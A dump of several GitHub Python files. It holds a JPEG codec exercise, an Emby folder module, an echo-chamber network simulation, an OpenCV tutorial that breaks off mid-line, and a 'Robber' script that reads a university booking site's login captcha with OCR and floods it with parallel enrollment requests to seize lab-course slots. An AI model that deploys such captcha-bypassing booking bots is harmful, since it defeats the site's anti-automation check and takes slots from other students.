+{"seq_id":"24835596506","text":"import os\nfrom huffman import HuffmanTree\nimport math\nimport numpy as np\nfrom scipy import fftpack\nfrom PIL import Image\n\n\nclass JPEGFileReader:\n\tTABLE_SIZE_BITS = 16\n\tBLOCKS_COUNT_BITS = 32\n\tDC_CODE_LENGTH_BITS = 4\n\tCATEGORY_BITS = 4\n\tAC_CODE_LENGTH_BITS = 8\n\tRUN_LENGTH_BITS = 4\n\tSIZE_BITS = 4\n\n\tdef __init__(self, filepath):\n\t\tself.__file = open(filepath, 'r')\n\n\tdef read_int(self, size):\n\t\tif size == 0:\n\t\t\treturn 0\n\t\tbin_num = self.__read_str(size)\n\t\tif bin_num[0] == '1':\n\t\t\treturn self.__int2(bin_num)\n\t\telse:\n\t\t\treturn self.__int2(binstr_flip(bin_num)) * -1\n\n\tdef read_dc_table(self):\n\t\ttable = dict()\n\t\ttable_size = self.__read_uint(self.TABLE_SIZE_BITS)\n\t\tfor _ in range(table_size):\n\t\t\tcategory = self.__read_uint(self.CATEGORY_BITS)\n\t\t\tcode_length = self.__read_uint(self.DC_CODE_LENGTH_BITS)\n\t\t\tcode = self.__read_str(code_length)\n\t\t\ttable[code] = category\n\t\treturn table\n\n\tdef read_ac_table(self):\n\t\ttable = dict()\n\t\ttable_size = self.__read_uint(self.TABLE_SIZE_BITS)\n\t\tfor _ in range(table_size):\n\t\t\trun_length = self.__read_uint(self.RUN_LENGTH_BITS)\n\t\t\tsize = self.__read_uint(self.SIZE_BITS)\n\t\t\tcode_length = self.__read_uint(self.AC_CODE_LENGTH_BITS)\n\t\t\tcode = self.__read_str(code_length)\n\t\t\ttable[code] = (run_length, size)\n\t\treturn table\n\n\tdef read_blocks_count(self):\n\t\treturn self.__read_uint(self.BLOCKS_COUNT_BITS)\n\n\tdef read_huffman_code(self, table):\n\t\tprefix = ''\n\t\t# TODO: перервати цикл if __read_char не повертає новий символ\n\t\twhile prefix not in table:\n\t\t\tprefix += self.__read_char()\n\t\treturn table[prefix]\n\n\tdef __read_uint(self, size):\n\t\tif size <= 0:\n\t\t\traise ValueError(\"розмір повинен бути більшим за 0\")\n\t\treturn self.__int2(self.__read_str(size))\n\n\tdef __read_str(self, length):\n\t\treturn self.__file.read(length)\n\n\tdef __read_char(self):\n\t\treturn self.__read_str(1)\n\n\tdef __int2(self, bin_num):\n\t\treturn int(bin_num, 2)\n\n\ndef encode(output_f: str, input_f: str, table_num: int):\n\tinput_file = f\"Im_bmp/{input_f}bmp\"\n\toutput_file = f\"{output_f}.asf\"\n\timage = Image.open(input_file)\n\tycbcr = image.convert('YCbCr')\n\tnpmat = np.array(ycbcr, dtype=np.uint8)\n\trows, cols = npmat.shape[0], npmat.shape[1]\n\tif rows % 8 == cols % 8 == 0:\n\t\tblocks_count = rows // 8 * cols // 8\n\telse:\n\t\traise ValueError(\"Ширина і висота зображення мають бути кратними 8\")\n\tdc = np.empty((blocks_count, 3), dtype=np.int32)\n\tac = np.empty((blocks_count, 63, 3), dtype=np.int32)\n\tfor i in range(0, rows, 8):\n\t\tfor j in range(0, cols, 8):\n\t\t\ttry:\n\t\t\t\tblock_index += 1\n\t\t\texcept NameError:\n\t\t\t\tblock_index = 0\n\t\t\tfor k in range(3):\n\t\t\t\t# split 8x8 block and center the data range on zero\n\t\t\t\t# [0, 255] --> [-128, 127]\n\t\t\t\tblock = npmat[i:i + 8, j:j + 8, k] - 128\n\t\t\t\tdct_matrix = dct_2d(block)\n\t\t\t\tquant_matrix = quantize(dct_matrix, 'lum' if k == 0 else 'chrom', table_num)\n\t\t\t\tzigzag = block_to_zigzag(quant_matrix)\n\t\t\t\tdc[block_index, k] = zigzag[0]\n\t\t\t\tac[block_index, :, k] = zigzag[1:]\n\tH_DC_Y = HuffmanTree(np.vectorize(bits_required)(dc[:, 0]))\n\tH_DC_C = HuffmanTree(np.vectorize(bits_required)(dc[:, 1:].flat))\n\tH_AC_Y = HuffmanTree(flatten(run_length_encode(ac[i, :, 0])[0] for i in range(blocks_count)))\n\tH_AC_C = HuffmanTree(flatten(run_length_encode(ac[i, :, j])[0] for i in range(blocks_count) for j in [1, 2]))\n\ttables = {\n\t\t'dc_y': H_DC_Y.value_to_bitstring_table(),\n\t\t'ac_y': H_AC_Y.value_to_bitstring_table(),\n\t\t'dc_c': H_DC_C.value_to_bitstring_table(),\n\t\t'ac_c': H_AC_C.value_to_bitstring_table()}\n\tsize_vyhsdnogo = os.path.getsize(input_file)\n\twith open(\"results_jpeg.txt\", \"a\", encoding=\"utf8\") as file:\n\t\tprint(f'Таблиця квантування - {table_num}, зображення - {input_f}', file=file)\n\t\tprint(f'Розмір вихідного файла: {size_vyhsdnogo} байт', file=file)\n\twrite_to_file(f\"Result/{output_file}\", dc, ac, blocks_count, tables)\n\treturn size_vyhsdnogo\n\n\ndef dequantize(block, component, table_num):\n\tq = load_quantization_table(component, table_num)\n\treturn block * q\n\n\ndef idct_2d(image):\n\treturn fftpack.idct(fftpack.idct(image.T, norm='ortho').T, norm='ortho')\n\n\ndef zigzag_to_block(zigzag):\n\trows = cols = int(math.sqrt(len(zigzag)))\n\tif rows * cols != len(zigzag):\n\t\traise ValueError(\"Довжина зіг-зага повинна бути ідеальним квадратом \")\n\tblock = np.empty((rows, cols), np.int32)\n\tfor i, point in enumerate(zigzag_points(rows, cols)):\n\t\tblock[point] = zigzag[i]\n\treturn block\n\n\ndef read_image_file(filepath):\n\treader = JPEGFileReader(filepath)\n\ttables = dict()\n\tfor table_name in ['dc_y', 'ac_y', 'dc_c', 'ac_c']:\n\t\tif 'dc' in table_name:\n\t\t\ttables[table_name] = reader.read_dc_table()\n\t\telse:\n\t\t\ttables[table_name] = reader.read_ac_table()\n\tblocks_count = reader.read_blocks_count()\n\tdc = np.empty((blocks_count, 3), dtype=np.int32)\n\tac = np.empty((blocks_count, 63, 3), dtype=np.int32)\n\tfor block_index in range(blocks_count):\n\t\tfor component in range(3):\n\t\t\tdc_table = tables['dc_y'] if component == 0 else tables['dc_c']\n\t\t\tac_table = tables['ac_y'] if component == 0 else tables['ac_c']\n\t\t\tcategory = reader.read_huffman_code(dc_table)\n\t\t\tdc[block_index, component] = reader.read_int(category)\n\t\t\tcells_count = 0\n\t\t\t# TODO: спроба зробити читання AC коефіцієнтів краще\n\t\t\twhile cells_count < 63:\n\t\t\t\trun_length, size = reader.read_huffman_code(ac_table)\n\t\t\t\tif (run_length, size) == (0, 0):\n\t\t\t\t\twhile cells_count < 63:\n\t\t\t\t\t\tac[block_index, cells_count, component] = 0\n\t\t\t\t\t\tcells_count += 1\n\t\t\t\telse:\n\t\t\t\t\tfor _ in range(run_length):\n\t\t\t\t\t\tac[block_index, cells_count, component] = 0\n\t\t\t\t\t\tcells_count += 1\n\t\t\t\t\tif size == 0:\n\t\t\t\t\t\tac[block_index, cells_count, component] = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tvalue = reader.read_int(size)\n\t\t\t\t\t\tac[block_index, cells_count, component] = value\n\t\t\t\t\tcells_count += 1\n\treturn dc, ac, tables, blocks_count\n\n\ndef uint_to_binstr(number, size):\n\treturn bin(number)[2:][-size:].zfill(size)\n\n\ndef int_to_binstr(n):\n\tif n == 0:\n\t\treturn ''\n\tbinstr = bin(abs(n))[2:]\n\treturn binstr if n > 0 else binstr_flip(binstr)\n\n\ndef binstr_flip(binstr):\n\tif not set(binstr).issubset('01'):\n\t\traise ValueError(\"binstr повинен мати лише '0' та '1'\")\n\treturn ''.join(map(lambda c: '0' if c == '1' else '1', binstr))\n\n\ndef write_to_file(filepath, dc, ac, blocks_count, tables):\n\tf = open(filepath, 'w')\n\tfor table_name in ['dc_y', 'ac_y', 'dc_c', 'ac_c']:\n\t\tf.write(uint_to_binstr(len(tables[table_name]), 16))\n\t\tfor key, value in tables[table_name].items():\n\t\t\tif table_name in {'dc_y', 'dc_c'}:\n\t\t\t\tf.write(uint_to_binstr(key, 4))\n\t\t\t\tf.write(uint_to_binstr(len(value), 4))\n\t\t\t\tf.write(value)\n\t\t\telse:\n\t\t\t\tf.write(uint_to_binstr(key[0], 4))\n\t\t\t\tf.write(uint_to_binstr(key[1], 4))\n\t\t\t\tf.write(uint_to_binstr(len(value), 8))\n\t\t\t\tf.write(value)\n\n\tf.write(uint_to_binstr(blocks_count, 32))\n\tfor b in range(blocks_count):\n\t\tfor c in range(3):\n\t\t\tcategory = bits_required(dc[b, c])\n\t\t\tsymbols, values = run_length_encode(ac[b, :, c])\n\t\t\tdc_table = tables['dc_y'] if c == 0 else tables['dc_c']\n\t\t\tac_table = tables['ac_y'] if c == 0 else tables['ac_c']\n\t\t\tf.write(dc_table[category])\n\t\t\tf.write(int_to_binstr(dc[b, c]))\n\t\t\tfor i in range(len(symbols)):\n\t\t\t\tf.write(ac_table[tuple(symbols[i])])\n\t\t\t\tf.write(values[i])\n\tf.close()\n\n\ndef bits_required(n):\n\tn, result = abs(n), 0\n\twhile n > 0:\n\t\tn >>= 1\n\t\tresult += 1\n\treturn result\n\n\ndef flatten(lst):\n\treturn [item for sublist in lst for item in sublist]\n\n\ndef run_length_encode(arr):\n\tlast_nonzero, run_length = -1, 0\n\tfor i, elem in enumerate(arr):\n\t\tif elem != 0:\n\t\t\tlast_nonzero = i\n\tsymbols, values = [], []\n\tfor i, elem in enumerate(arr):\n\t\tif i > last_nonzero:\n\t\t\tsymbols.append((0, 0))\n\t\t\tvalues.append(int_to_binstr(0))\n\t\t\tbreak\n\t\telif elem == 0 and run_length < 15:\n\t\t\trun_length += 1\n\t\telse:\n\t\t\tsize = bits_required(elem)\n\t\t\tsymbols.append((run_length, size))\n\t\t\tvalues.append(int_to_binstr(elem))\n\t\t\trun_length = 0\n\treturn symbols, values\n\n\ndef dct_2d(image):\n\treturn fftpack.dct(fftpack.dct(image.T, norm='ortho').T, norm='ortho')\n\n\ndef load_quantization_table(component, table_num: int):\n\tif component == 'lum':\n\t\tif table_num == 1:\n\t\t\tq = np.array([\n\t\t\t\t[2, 2, 2, 2, 3, 4, 5, 6],\n\t\t\t\t[2, 2, 2, 2, 3, 4, 5, 6],\n\t\t\t\t[2, 2, 2, 2, 4, 5, 7, 9],\n\t\t\t\t[2, 2, 2, 4, 5, 7, 9, 12],\n\t\t\t\t[3, 3, 4, 5, 8, 10, 12, 12],\n\t\t\t\t[4, 4, 5, 7, 10, 12, 12, 12],\n\t\t\t\t[5, 5, 7, 9, 12, 12, 12, 12],\n\t\t\t\t[6, 6, 9, 12, 12, 12, 12, 12]])\n\t\telif table_num == 2:\n\t\t\tq = np.array([\n\t\t\t\t[16, 11, 10, 16, 24, 40, 51, 61],\n\t\t\t\t[12, 12, 14, 19, 26, 48, 60, 55],\n\t\t\t\t[14, 13, 16, 24, 40, 57, 69, 56],\n\t\t\t\t[14, 17, 22, 29, 51, 87, 80, 62],\n\t\t\t\t[18, 22, 37, 56, 68, 109, 103, 77],\n\t\t\t\t[24, 35, 55, 64, 81, 104, 113, 92],\n\t\t\t\t[49, 64, 78, 87, 103, 121, 120, 101],\n\t\t\t\t[72, 92, 95, 98, 112, 100, 103, 99]])\n\telif component == 'chrom':\n\t\tif table_num == 1:\n\t\t\tq = np.array([\n\t\t\t\t[3, 3, 5, 9, 13, 15, 15, 15],\n\t\t\t\t[3, 4, 6, 11, 14, 12, 12, 12],\n\t\t\t\t[5, 6, 9, 14, 12, 12, 12, 12],\n\t\t\t\t[9, 11, 14, 12, 12, 12, 12, 12],\n\t\t\t\t[13, 14, 12, 12, 12, 12, 12, 12],\n\t\t\t\t[15, 12, 12, 12, 12, 12, 12, 12],\n\t\t\t\t[15, 12, 12, 12, 12, 12, 12, 12],\n\t\t\t\t[15, 12, 12, 12, 12, 12, 12, 12]])\n\t\telif table_num == 2:\n\t\t\tq = np.array([\n\t\t\t\t[17, 18, 24, 47, 99, 99, 99, 99],\n\t\t\t\t[18, 21, 26, 66, 99, 99, 99, 99],\n\t\t\t\t[24, 26, 56, 99, 99, 99, 99, 99],\n\t\t\t\t[47, 66, 99, 99, 99, 99, 99, 99],\n\t\t\t\t[99, 99, 99, 99, 99, 99, 99, 99],\n\t\t\t\t[99, 99, 99, 99, 99, 99, 99, 99],\n\t\t\t\t[99, 99, 99, 99, 99, 99, 99, 99],\n\t\t\t\t[99, 99, 99, 99, 99, 99, 99, 99]])\n\n\telse:\n\t\traise ValueError(f\"компонент має бути \\\"lum\\\" або \\\"chrom\\\", але {component} знайдено\")\n\treturn q\n\n\ndef quantize(block, component, table_num):\n\treturn (block / load_quantization_table(component, table_num)).round().astype(np.int32)\n\n\ndef block_to_zigzag(block):\n\treturn np.array([block[point] for point in zigzag_points(*block.shape)])\n\n\ndef zigzag_points(rows, cols):\n\tup, down, right, left, up_right, down_left = range(6)\n\n\tdef move(direction, pont):\n\t\treturn {\n\t\t\tup: lambda dot: (dot[0] - 1, dot[1]),\n\t\t\tdown: lambda dot: (dot[0] + 1, dot[1]),\n\t\t\tleft: lambda dot: (dot[0], dot[1] - 1),\n\t\t\tright: lambda dot: (dot[0], dot[1] + 1),\n\t\t\tup_right: lambda dot: move(up, move(right, dot)),\n\t\t\tdown_left: lambda dot: move(down, move(left, dot))\n\t\t}[direction](pont)\n\n\tdef inbounds(pont):\n\t\treturn 0 <= pont[0] < rows and 0 <= pont[1] < cols\n\n\tpoint, move_up = (0, 0), True\n\tfor i in range(rows * cols):\n\t\tyield point\n\t\tif move_up:\n\t\t\tif inbounds(move(up_right, point)):\n\t\t\t\tpoint = move(up_right, point)\n\t\t\telse:\n\t\t\t\tmove_up = False\n\t\t\t\tif inbounds(move(right, point)):\n\t\t\t\t\tpoint = move(right, point)\n\t\t\t\telse:\n\t\t\t\t\tpoint = move(down, point)\n\t\telse:\n\t\t\tif inbounds(move(down_left, point)):\n\t\t\t\tpoint = move(down_left, point)\n\t\t\telse:\n\t\t\t\tmove_up = True\n\t\t\t\tif inbounds(move(down, point)):\n\t\t\t\t\tpoint = move(down, point)\n\t\t\t\telse:\n\t\t\t\t\tpoint = move(right, point)\n\n\ndef decoder(output_f: str, input_f: str, table_num: int, size_f: int):\n\tinput_file = f\"Result/{input_f}.asf\"\n\toutput_file = f\"Result/{output_f}.jpeg\"\n\tdc, ac, tables, blocks_count = read_image_file(input_file)\n\tblock_side = 8\n\timage_side = int(math.sqrt(blocks_count)) * block_side\n\tblocks_per_line = image_side // block_side\n\tnpmat = np.empty((image_side, image_side, 3), dtype=np.uint8)\n\tfor block_index in range(blocks_count):\n\t\ti = block_index // blocks_per_line * block_side\n\t\tj = block_index % blocks_per_line * block_side\n\t\tfor c in range(3):\n\t\t\tzigzag = [dc[block_index, c]] + list(ac[block_index, :, c])\n\t\t\tquant_matrix = zigzag_to_block(zigzag)\n\t\t\tdct_matrix = dequantize(quant_matrix, 'lum' if c == 0 else 'chrom', table_num)\n\t\t\tblock = idct_2d(dct_matrix)\n\t\t\tnpmat[i:i + 8, j:j + 8, c] = block + 128\n\timage = Image.fromarray(npmat, 'YCbCr')\n\timage = image.convert('RGB')\n\timage.save(output_file)\n\tsize_jpeg = os.path.getsize(output_file)\n\twidth, height = image.size\n\tratio = size_f / size_jpeg\n\twith open(\"results_jpeg.txt\", \"a\", encoding=\"utf8\") as file:\n\t\tprint(f'Розмір файла JPEG: {size_jpeg} байт', file=file)\n\t\tprint(f'Розмір зображення JPEG: {width}x{height}', file=file)\n\t\tprint(f'Коефіцієнт стиснення = {ratio}\\n', file=file)\n\n\ndef main():\n\tfiles = os.listdir(\"./Im_bmp\")\n\tfile_names = [el[:4] for el in files]\n\tfor i in range(1, 3):\n\t\tfor j in file_names:\n\t\t\tsize = encode(f\"{j}_{i}\", j, i)\n\t\t\tdecoder(f\"{j}_{i}\", f\"{j}_{i}\", i, size)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"DybkoAndrii/TIC_Dybko_529a","sub_path":"LessСompressionJPEG/lesscompression_jpeg.py","file_name":"lesscompression_jpeg.py","file_ext":"py","file_size_in_byte":12475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34263029624","text":"import xbmc\nfrom . import common\n\nclass Folder:\n def __init__(self, EmbyServer, embydb):\n self.EmbyServer = EmbyServer\n self.emby_db = embydb\n\n def folder(self, Item):\n if not common.library_check(Item, self.EmbyServer, self.emby_db, \"Folder\"):\n return False\n\n if 'Path' in Item and Item['Path']:\n if Item['Path'].find(\"/\") >= 0: # Linux\n Path = f\"{Item['Path']}/\"\n else: # Windows\n Path = f\"{Item['Path']}\\\\\"\n\n self.emby_db.add_reference(Item['Id'], [], [], None, \"Folder\", None, [], Item['LibraryIds'], None, None, None, Path, None, None, None)\n xbmc.log(f\"EMBY.core.folder: ADD OR REPLACE folder {Item['Id']}: {Path}\", 1) # LOGINFO\n\n return True\n\n def remove(self, Item):\n self.emby_db.remove_item(Item['Id'], Item['Library']['Id'])\n xbmc.log(f\"EMBY.core.folder: DELETE Folder {Item['Id']}\", 1) # LOGINFO\n\n def userdata(self, Item):\n xbmc.log(f\"EMBY.core.folder: USERDATA FOLDER {Item}\", 1) # LOGINFO\n self.folder(Item)\n","repo_name":"MediaBrowser/plugin.video.emby","sub_path":"core/folder.py","file_name":"folder.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":278,"dataset":"github-code","pt":"77"} +{"seq_id":"1706088745","text":"# coding: utf-8\n# Echo Chamber Model\n# social_media.py\n# Last Update: 20190410\n# by Kazutoshi Sasahara\n\nimport numpy as np\nimport networkx as nx\nimport pandas as pd\n\n\nclass Message(object):\n def __init__(self, msg_id, orig_msg_id, who_posted, who_originated, content):\n self.msg_id = msg_id\n self.orig_msg_id = orig_msg_id\n self.who_posted = who_posted\n self.who_originated = who_originated\n self.content = content\n\n\n def to_dict(self):\n return {'msg_id': self.msg_id, 'orig_msg_id':self.orig_msg_id,\n 'who_posted':self.who_posted, 'who_originated':self.who_originated,\n 'content':self.content,}\n\n\n\nclass SocialMedia(object):\n def __init__(self, num_agents, num_links, l, sns_seed):\n self.num_agents = num_agents\n random_state = np.random.RandomState(sns_seed)\n self.G = nx.gnm_random_graph(n=num_agents, m=num_links, seed=random_state, directed=True)\n self.modify_random_graph()\n self.message_dic = {}\n self.message_df = pd.DataFrame(columns=['msg_id', 'orig_msg_id', 'who_posted', 'who_originated', 'content'])\n self.screen_size = l\n\n\n def modify_random_graph(self):\n for no_outdegree_node in [k for k, v in list(self.G.out_degree()) if v == 0]:\n target_node = np.random.choice([k for k, v in list(self.G.out_degree()) if v >= 2])\n i = np.random.choice(len(self.G.edges(target_node)))\n target_edge = list(self.G.edges(target_node))[i]\n self.G.remove_edge(target_edge[0], target_edge[1])\n self.G.add_edge(no_outdegree_node, target_edge[1])\n\n\n def set_node_colors(self, node_colors):\n for i, c in enumerate(node_colors):\n self.G.nodes[i]['color'] = c\n\n\n def show_screen(self, user_id):\n friends = self.G.neighbors(user_id)\n friend_message_df = self.message_df[self.message_df['who_posted'].isin(friends)]\n friend_message_df = friend_message_df[friend_message_df['who_originated'] != user_id]\n return friend_message_df.tail(self.screen_size)\n\n\n def update_message_db(self, t, msg):\n self.message_df = self.message_df.append(msg.to_dict(), ignore_index=True).tail(self.num_agents)\n \n\n def recommend_similar_users(self, user_id, epsilon, num_agents):\n similar_users = []\n my_message_df = self.message_df[self.message_df.who_originated == user_id].tail(1)\n\n if len(my_message_df) > 0:\n last_message = my_message_df.content.values[0]\n friends = self.G.neighbors(user_id)\n friends = list(friends)\n similar_messages_df = self.message_df[self.message_df.who_originated != user_id].tail(num_agents)\n similar_messages_df = similar_messages_df[abs(last_message - similar_messages_df.content) < epsilon]\n if len(similar_messages_df) > 0:\n similar_users = [u for u in similar_messages_df.who_originated.values if u not in friends]\n\n return similar_users\n\n\n def rewire_users(self, user_id, unfollow_id, follow_id):\n self.G.remove_edge(user_id, unfollow_id)\n self.G.add_edge(user_id, follow_id)","repo_name":"soramame0518/echo_chamber_model","sub_path":"social_media.py","file_name":"social_media.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"77"} +{"seq_id":"2335928031","text":"# -*- coding: utf-8 -*-\nimport time\nimport requests\nimport threading\nfrom datetime import datetime\n\nfrom core.ocr import OCR\nfrom core.log import logger\nfrom core.storage import config, Session\nfrom core.simple_ocr import SimpleOCR\n\n# 常量\nurl = config.net['url']\nua = config.net['user-agent']\n\n# 全局变量\nrunning = True\n\n\nclass Robber:\n def __init__(self, session: requests.Session):\n if str(config.target['type']) == '0':\n type_code = '0'\n type_str = 'bas' # 基物实验上,这里是bas\n # type_str = 'adv' # 基物实验下,这里是adv\n else:\n type_code = '1'\n type_str = 'aut' # 基物实验上,这里是aut\n # 基物实验下,不知道是什么\n\n self.rob_params = {'type': type_code, 'step': '3', 'eid': type_str + config.target['week']}\n self.rob_data = {'Result': config.target['course']}\n\n self.session = session\n\n @property\n def token(self):\n return self.session.cookies.get('PHPSESSID')\n\n def rob(self):\n t = threading.Thread(target=self._rob)\n t.start()\n return t\n\n def _rob(self):\n global running\n t0 = datetime.now()\n resp = self.session.post(url + 'elect.php', self.rob_data, params=self.rob_params)\n t1 = datetime.now()\n html = resp.content.decode('gb2312')\n if html.find(\"你还没有登录,无权访问。\") != -1:\n logger.fatal(\"[token {}][begin {}][end {}][elapse {}] Not login\".format(\n self.token[:5],\n t0.strftime(\"%M:%S.%f\")[:-3],\n t1.strftime(\"%M:%S.%f\")[:-3],\n \"{:.3f}\".format((t1 - t0).total_seconds())))\n return False\n if html.find(\"还没做吧?!\") != -1:\n logger.info(\"[token {}][begin {}][end {}][elapse {}] Early\".format(\n self.token[:5],\n t0.strftime(\"%M:%S.%f\")[:-3],\n t1.strftime(\"%M:%S.%f\")[:-3],\n \"{:.3f}\".format((t1 - t0).total_seconds())))\n return False\n if html.find(\"该组已经选满。请重试!\") != -1:\n # 选课不可能进行,停止接下来的抢课进程\n logger.warning(\"[token {}][begin {}][end {}][elapse {}] Full\".format(\n self.token[:5],\n t0.strftime(\"%M:%S.%f\")[:-3],\n t1.strftime(\"%M:%S.%f\")[:-3],\n \"{:.3f}\".format((t1 - t0).total_seconds())))\n running = False\n return False\n if html.find(\"此题目在这个时间段没有开放\") != -1:\n # 选课不可能进行,停止接下来的抢课进程\n logger.error(\"[token {}][begin {}][end {}][elapse {}] Lesson not open\".format(\n self.token[:5],\n t0.strftime(\"%M:%S.%f\")[:-3],\n t1.strftime(\"%M:%S.%f\")[:-3],\n \"{:.3f}\".format((t1 - t0).total_seconds())))\n return False\n if html.find(\"三天内课表已冻结,请换个时间段!\") != -1:\n # 选课不可能进行,停止接下来的抢课进程\n logger.error(\"[token {}][begin {}][end {}][elapse {}] Lesson expired\".format(\n self.token[:5],\n t0.strftime(\"%M:%S.%f\")[:-3],\n t1.strftime(\"%M:%S.%f\")[:-3],\n \"{:.3f}\".format((t1 - t0).total_seconds())))\n running = False\n return False\n if html.find(\"恭喜你,选课成功!\") != -1:\n # 选课完成,停止接下来的抢课进程\n logger.warning(\"[token {}][begin {}][end {}][elapse {}] Success\".format(\n self.token[:5],\n t0.strftime(\"%M:%S.%f\")[:-3],\n t1.strftime(\"%M:%S.%f\")[:-3],\n \"{:.3f}\".format((t1 - t0).total_seconds())))\n running = False\n return True\n\n logger.error(\"[token {}][begin {}][end {}][elapse {}] Unknown error\".format(\n self.token[:5],\n t0.strftime(\"%M:%S.%f\")[:-3],\n t1.strftime(\"%M:%S.%f\")[:-3],\n \"{:.3f}\".format((t1 - t0).total_seconds())))\n # print(html)\n\n\nclass RobberManager:\n def __init__(self):\n self.robbers = []\n self.sessions = []\n self.login()\n if config.ocr['local']:\n self.ocr = SimpleOCR()\n else:\n self.ocr = OCR()\n\n @property\n def login_data(self):\n return {\n 'txtUid': config.account['username'],\n 'txtPwd': config.account['password'],\n 'txtChk': self.checkcode\n }\n\n def _login(self):\n for retry in range(3):\n session = requests.session()\n session.headers['User-Agent'] = ua\n session.get(url + 'index.php')\n response = session.get(url + 'checkcode.php')\n img_bin = response.content\n self.checkcode = self.ocr.number_from_bytes(img_bin)\n if not self.checkcode:\n logger.info(\"Failed to get checkcode, retry:{}\".format(retry + 1))\n continue\n session.post(url + 'login.php', data=self.login_data)\n resp = session.get(url + 'elect.php')\n if resp.status_code == 200 and resp.content.decode('gb2312').find('你还没有登录,无权访问。') == -1:\n logger.info(\"Login succeed\")\n return session\n else:\n logger.info(\"Login failed, retry:{}\".format(retry + 1))\n continue\n return None\n\n @staticmethod\n def test_available(session_id):\n session = requests.session()\n session.headers['User-Agent'] = ua\n session.cookies.set('PHPSESSID', session_id)\n resp = session.get(url + 'elect.php')\n if resp.status_code == 200 and resp.content.decode('gb2312').find('你还没有登录,无权访问。') == -1:\n logger.info(\"Session is available: {}...\".format(session_id[0:10]))\n return session\n else:\n logger.info(\"Session is not available: {}...\".format(session_id[0:10]))\n return None\n\n def login(self):\n logger.warning(\"begin to get enough sessions\")\n session_ids = Session.load()\n sessions = []\n for sid in session_ids:\n session = self.test_available(sid)\n if session:\n sessions.append(session)\n if len(sessions) >= config.speed['number-of-clients']:\n break\n load_number = len(sessions)\n total_retry = 0\n total_retry_max = 5\n try:\n while len(sessions) < config.speed['number-of-clients'] and total_retry < total_retry_max:\n session = self._login()\n if session:\n sessions.append(session)\n else:\n total_retry += 1\n except KeyboardInterrupt:\n Session.dump([x.cookies.get('PHPSESSID') for x in sessions])\n exit(1)\n got = len(sessions)\n new_number = got - load_number\n logger.warning(\n \"Wants {}, got {}, loaded {}, new {}, total retry {}\".format(config.speed['number-of-clients'], got,\n load_number, new_number, total_retry))\n Session.dump([x.cookies.get('PHPSESSID') for x in sessions])\n self.sessions = sessions\n\n def logout(self):\n for session in self.sessions:\n session.get(url + 'logout.php')\n\n def rob(self):\n global running\n running = True\n self.robbers = [Robber(x) for x in self.sessions]\n interval = config.speed['interval']\n max_running_time = config.speed['max-running-time']\n start_at = time.time()\n threads = []\n try:\n while max_running_time == 0 or time.time() - start_at < max_running_time:\n for robber in self.robbers:\n if not running:\n logger.info(\"Completed\")\n logger.info(\"Waiting for running threads to finish\")\n for t in threads:\n t.join()\n return\n t = robber.rob()\n threads.append(t)\n time.sleep(interval)\n logger.info(\"Time Limit Exceeded\")\n logger.info(\"Waiting for running threads to finish\")\n for t in threads:\n t.join()\n except KeyboardInterrupt:\n logger.info(\"Interrupted\")\n exit(1)\n\n\n# debug\nif __name__ == '__main__':\n r = RobberManager()\n r.rob()\n","repo_name":"wwlyeye/PhysicalExperimentSelector","sub_path":"core/selector.py","file_name":"selector.py","file_ext":"py","file_size_in_byte":8663,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"4012828414","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport numpy as np\nimport cv2 as cv\nimport matplotlib.pyplot as plt\n\n# Print Multiple images in the same figure, pyplot\ndef show_images(images, cols = 1, titles = None):\n assert((titles is None)or (len(images) == len(titles)))\n n_images = len(images)\n if titles is None: titles = ['Image (%d)' % i for i in range(1,n_images + 1)]\n fig = plt.figure()\n for n, (image, title) in enumerate(zip(images, titles)):\n a = fig.add_subplot(cols, np.ceil(n_images/float(cols)), n + 1)\n if image.ndim == 2:\n plt.gray()\n plt.imshow(image)\n a.set_title(title)\n fig.set_size_inches(np.array(fig.get_size_inches()) * n_images)\n plt.show()\n\n#from skimage import io, data\n\n# Using skimage io\n#lena = data.imread('lena.png', as_grey=True)\n#io.imshow(lena)\n\n# Load an color image in grayscale OpenCV\nimg = cv.imread('lena.png', 1)\n\n# Display image for Windows\n#cv.imshow('Lena',img)\n#cv.waitKey(0)\n#cv.destroyAllWindows()\n\n# Display for Ubuntu, using pyplot\nplt.figure(1)\nplt.imshow(img, cmap=\"gray\")\nplt.title(\"Gray Lena\")\n\n# Saving image to disk with OpenCV\ncv.imwrite(\"Lena_gray.png\", img)\n\n# Changing color spaces\n# BGR -> Gray flag is cv.COLOR_BGR2GRAY\n# BGR -> HSV flag is cv.COLOR_BGR2HSV\n# cv.cvtColor(img, flag)\n\nbgr_img = cv.imread('lena.png')\n\nb,g,r = cv.split(bgr_img) # get b,g,r\nrgb_img = cv.merge([r,g,b]) # switch it to rgb\n\ngray_img = cv.cvtColor(bgr_img, cv.COLOR_BGR2GRAY)\n\nhsv_img = cv.cvtColor(bgr_img, cv.COLOR_BGR2HSV)\n\nshow_images([rgb_img, gray_img, hsv_img], titles=['RGB', 'Gray', 'HSV'])\n\n# Transformations cv.warp_____\n\n## Scaling\n# fx and fy are resizing factors, 0.5 will result in half the size\nhalf_img = cv.resize(rgb_img, None, fx=0.5, fy=0.5, interpolation=cv.INTER_AREA)\nshow_images([rgb_img, half_img], titles=['Full','Half'])\n\n## Rotation\nrows, cols, dims = rgb_img.shape\nM = cv.getRotationMatrix2D((cols/2, rows/2), 90, 1)\nrot_img = cv.warpAffine(rgb_img, M, (cols, rows))\nshow_images([rgb_img, rot_img], titles=['Original', 'Rotated'])\n\n## Affine Transformation\n### This process takes three points from the image and their desired position\n### after transformation\npts1 = np.float32([[50, 30], [200, 50], [5, 200]])\npts2 = np.float32([[10, 100], [200, 50], [50, 250]])\n\nM = cv.getAffineTransform(pts1, pts2)\ntrans_img = cv.warpAffine(rgb_img, M, (cols, rows))\n\nshow_images([rgb_img, trans_img], titles=['Orginal', 'Transformed'])\n\n## Perspective Transformation\n### This transformation is useful to focus the image in just one section of it\n### It needs four points, and another four that will be their positions in the\n### output.\npts1 = np.float32([[56, 65], [368, 52], [28, 387], [389, 